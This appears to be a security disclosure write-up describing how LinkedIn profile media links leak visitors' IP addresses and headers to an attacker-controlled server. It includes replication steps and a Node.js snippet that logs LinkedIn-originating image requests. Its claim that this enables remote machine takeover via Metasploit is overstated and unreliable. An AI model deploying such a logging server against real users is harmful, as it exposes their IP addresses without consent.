Skip to content

Latest commit

 

History

History
136 lines (105 loc) · 5.31 KB

File metadata and controls

136 lines (105 loc) · 5.31 KB

Summary

The vulnerability lead to IP disclosure which can preform a harmful actions such as takeover user's machine by using Metasploit framework.

Replication Steps

Step 1:
  • Replace {user-name} with your user name then go, https://www.linkedin.com/in/{user-name}/edit/topcard/.

You will see something like this

Step 2:
  • Go to media section, Then add a link. Step2

When com.linkedin.voyager.feed.urlpreview.PreviewImage failed in getting preview images will used our link as a preview-image in case of this you should avoid any image url in meta-tags.

  • Linkedin url preview endpoint
    https://www.linkedin.com/voyager/api/feed/urlpreview/{URL}
    

For example:

When adding https://a738b3cb.ngrok.io/user, we got:

  • Response:

    {
    "data": {
    "$deletedFields": [],
    "value": {
      "com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful"
    },
    "$type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewResponse",
    "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root"
    },
    "included": [
    {
      "$deletedFields": [],
      "data": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful,data",
      "$type": "com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful",
      "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful"
    },
    {
      "urn": "urn:li:article:7726755832606755082",
      "previewImages": [],
      "$deletedFields": [
        "description",
        "update"
      ],
      "resolvedUrl": "https://a738b3cb.ngrok.io/user",
      "source": "a738b3cb.ngrok.io",
      "id": "urn:li:article:7726755832606755082",
      "type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewResponse",
      "title": "The Rock",
      "url": "https://a738b3cb.ngrok.io/user",
      "$type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewData",
      "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful,data"
    }
    ]
    }
  • If previewImages key on the response is an empty array, com.linkedin.voyager.feed.urlpreview.PreviewImage will use resolvedUrl as a preview image.

    preview-image

  • When a user visit the profile and click on See more, The preview image will be loaded in background directly.

    loaded in background

  • I added a new header tag called User-Message (yser-Message )to request header.

    adding new header-tag

  • I might get the header tag with it contents in logs.

    We got the message

We've got the flag

Attack script/tool

It's an express.js application written in Node.js.

Author By me
Written in Node.js
Dependencies {"express": "^4.15.3"}
Installion npm install
Run node start
  • We need to check accept and referer header tag to detect if request was sent from linkedin.com or not

    app.get('/user', function (req, res) {
        if (/image\/(.*)/.test(req.header('accept')) && /linkedin.com/.test(req.header('referer'))) {
            res.sendFile(ourImage);
            storeLogs();
        } else {
            res.sendFile(ourHTMLpage);
        }
         ...
  • If accept & referer matched, stream the image and store this request payload in log.json

  • Unless send a html page without any meta-tags that used for image

    <html prefix="og: http://ogp.me/ns#">
    <head>
        <title>The Rock (1996)</title>
        <meta property="og:title" content="The Rock" />
        <meta property="og:type" content="video.movie" />
        <meta property="og:url" content="http://www.imdb.com/title/tt0117500/" />
    </head>
    <body>
    </body>
    </html>

The full script in attachment

Exploitability

Since the attacker’s profile is publicly accessible, This vulnerability could affect all users on the given domain because it is publicly visible if the attackers profile is viewed by any other user on the platform. Furthermore, this could be used to perform actions against the victim (or any user visiting that page) and could potentially lead to took over the user’s machine remotely. This could happen by users navigating to the attacker’s profile on their own, or by the attacker somehow persuading the victim to navigate to the profile.

Impact

Took over a user’s machine would allow an attacker to perform harmful actions. A great topic about how to target a public IP with metasploit. .

Proof of concept

Watch the video on https://youtu.be/DNywwox2Lv8, Don't worry it's unlisted video